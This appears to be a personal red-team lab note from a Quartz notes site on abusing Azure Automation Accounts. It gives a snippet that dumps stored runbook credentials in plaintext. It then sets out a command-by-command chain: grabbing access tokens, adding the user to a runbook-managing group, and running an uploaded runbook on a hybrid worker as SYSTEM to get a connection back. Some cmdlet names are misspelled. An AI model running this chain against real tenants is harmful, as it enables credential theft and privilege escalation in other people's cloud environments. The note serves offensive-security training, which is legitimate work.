🪴 Quartz 4.0

Search

SearchSearch

Automation Accounts

Apr 19, 20242 min read

Automation Accounts

Extract sensitive information by running scripts

  • and try to access linked credentials from there
  • always go through runbooks
    • they might have additional credentials

You can use the following snippet to access credentials (listed within portal.azure.com) from within a runbook:

$creds = Get-AutomationPSCredential -Name 'creds'
$creds.GetNetworkCredential() | fl *

Abusing HybridWorkers

  • runbook can run on “hybrid worker groups”
    • this runs on non-azure resources runs as SYSTEM on windows machines, as nxworker on linux machines

Example with automation task

$ az ad signed-in-user show # get sip ProxyAdress as user
$ az automation account list
$ az ad signed-in-user list-owned-objects # owns group that manages runbooks
$ az account get-access-token --resource-type aad-graph # so that we can use powershell
$ az account get-access-token # ARM access token
PS> $token = "aad-graph-token"
PS> Connect-AzureAD -AadAccessToken $AADToken -TenantId tenantid -AccountId accountid
PS> Add-AzureADGroupMember -ObjectID groupid -RefObjecdId user-id-of-mark -Verbose # not opsec-safe
PS> $AccessToken "access-token"
PS> Connect-AzureAD -AccessToken $AccessToken -GraphAccesToken $AADToken -AccountId accountid
PS> Get-AzRoleAssignments
PS> Get-AzAutomationHybridWorkerGroup -AutomationAccountName HybridAutomation -ResourceGroupName Engineering # note "name"
PS> Import-AzAutoamtionRunbook -Name student1 -Type PowerShell -Path c:\azad\tools\student1.ps1 -AutomationAccountName HybridAutomation -resourceGroupName Engineering
PS> Publish-AzAutomationRunbook -RunbookName student1 -AutomationAccountName HybridAutomation -ResourceGroupName Engineering
PS> Start-AzAutomationRunbook -RunbookName student1 -AutomationAccountName HybridAutomation -ResourceGroupName Engineering
# waiting for the connection back

Enumeration

PS C:\Windows\system32> az ad signed-in-user show
 
# "objectId": "f66e133c-bd01-4b0b-b3b7-7cd949fd45f3"
# "userPrincipalName": "[email protected]"
 
# now we see that we are owner of the 'automation admins' group
az ad signed-in-user list-owned-objects --query '[][displayname]'
 
# which resources do we have?
az resource list --query '[][name, type]' -o table
 
az extension add --upgrade -n automation
az automation account list # shows an error, cannot see anything (maybe because I am the owner, not a member)
 
az ad signed-in-user list-owned-objects
# see that I can use runbooks (automation admins)
 
# list hybrid worker group
PS C:\Users\studentuser64> Get-AzAutomationHybridWorkerGroup -AutomationAccountName HybridAutomation -ResourceGroupName Engineering
 
 
ResourceGroupName     : Engineering
AutomationAccountName : HybridAutomation
Name                  : Workergroup1
RunbookWorker         : {defeng-adcsrv.defeng.corp}
GroupType             : User

Abuse

# import, publish and run a workbook
Import-AzAutomationRunbook -Name student64 -Path C:\AzAD\Tools\student64.ps1 -AutomationAccountName HybridAutomation -ResourceGroupName Engineering -Type PowerShell -Force -Verbose
 
Publish-AzAutomationRunbook -RunbookName student64 -AutomationAccountName HybridAutomation -ResourceGroupName Engineering -Verbose
 
# and start the task
Start-AzAutomationRunbook -RunbookName student64 -RunOn Workergroup1 -AutomationAccountName HybridAutomation -ResourceGroupName Engineering -Verbose

Graph View

Backlinks